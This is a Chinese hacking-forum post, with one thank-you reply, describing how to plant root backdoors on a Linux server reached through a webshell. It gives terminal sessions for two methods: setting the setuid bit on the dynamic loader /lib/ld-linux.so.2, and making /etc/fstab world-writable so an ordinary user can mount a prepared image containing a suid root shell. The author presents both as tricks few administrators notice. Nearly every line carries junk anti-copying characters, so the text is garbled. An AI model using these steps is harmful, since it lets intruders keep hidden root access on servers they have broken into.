找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3167|回复: 1
打印 上一主题 下一主题

webshell下LINUX提权+留后门

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:56:25 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究+ S" b8 |" P# O6 d& g
3 t5 p- }3 E5 s2 T4 [- w9 Z
[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究( W# o6 o" `0 N' q" y3 X' D
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究9 ~0 M  ^+ X7 F; L3 z
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
: r2 n8 f; K" |0 Y6 R. }2 \[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究7 n+ }% z# {& \6 d$ [/ i
[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究7 T& P6 n& M! f. }4 m
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
9 S# P5 V& c8 `+ Slrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究" j& t. @7 k4 Y% Y: F- @
[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究! f; q  x2 N0 _( z2 z3 f  b( p- J" g# W  O
我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究+ M5 ^/ ]% H0 F3 F' A

1 y. e- @/ ~" L普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究
' o! |! R4 M9 R% s! D( t2 m
, x9 q6 }" x8 y1 c# q! j[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究
0 U0 K* i) h) i8 @* h! uxiaoyu2ezX-BUG-关注前沿信息安全技术研究
1 s4 M4 w& j2 K! O# E[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究
9 D' f' D, a0 S3 F+ e5 l2 X3 G  \9 ]root2ezX-BUG-关注前沿信息安全技术研究
8 S1 S- b$ Q  V: l& C[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
, n# v- ]4 _$ T4 }/ F) d6 S恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究" G5 S) V2 b2 v7 @5 S! e
- |! Z" D; @& D5 E
方法二:2ezX-BUG-关注前沿信息安全技术研究
  s$ P6 \5 p& ?+ l7 a. \; Y# B5 _- p& w, b# U/ s, x
看过程:2ezX-BUG-关注前沿信息安全技术研究
3 h, V6 _4 T3 H3 g
# ~7 |+ C5 y9 [9 a0 n+ h7 I# U. P[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究& E! B% l  i0 b% ^0 T
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究7 P' q% v: _- t+ s* g
. T) }9 s0 @8 t$ p7 x. q9 D' B+ n9 A
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究3 U% j' ^! @/ X

# ^7 h1 {. \$ f& g[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究- V" E  K/ o) L7 S3 p$ t' E
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
; z4 c) v1 o6 w6 Z$ q[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究# V2 Z" v0 o! A

7 d; I7 B  K/ D( L然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究
' ^7 J' q! E$ C- {/ a& U
* I/ j2 ]. Y3 b4 k5 v[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究4 G" |* E/ `" H, N9 E
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究7 S# b2 X& t/ @" E' l, Q8 M1 j
[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究
# q& \0 C  u  f4 }( n[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究9 u! P) H" M. O! s  _
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究0 e3 `/ L: U6 b& F2 G  M$ A
total 182ezX-BUG-关注前沿信息安全技术研究
! ?0 y. F+ u5 c7 s0 d: x( Fdrwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究
+ Y; [$ W8 I& F-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究+ A/ L! z$ N" @, ]( q, s2 L
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究- f' H/ i# |$ }; l" }3 W4 @
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究( k4 W: b+ ^& W) V) a& {
看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究
8 X" r+ V7 r' s: K. D+ Htest这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究
3 A+ S/ ~  p- k/ f
; R1 h9 O' L; r* f, m0 Z貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究
/ i9 P$ W1 }& [7 I# G2ezX-BUG-关注前沿信息安全技术研究0 x  Q3 l5 v3 T5 M
. T6 i0 c* A- H5 O0 L" {
回复

使用道具 举报

沙发
发表于 2013-3-13 15:10:29 | 只看该作者
谢谢分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表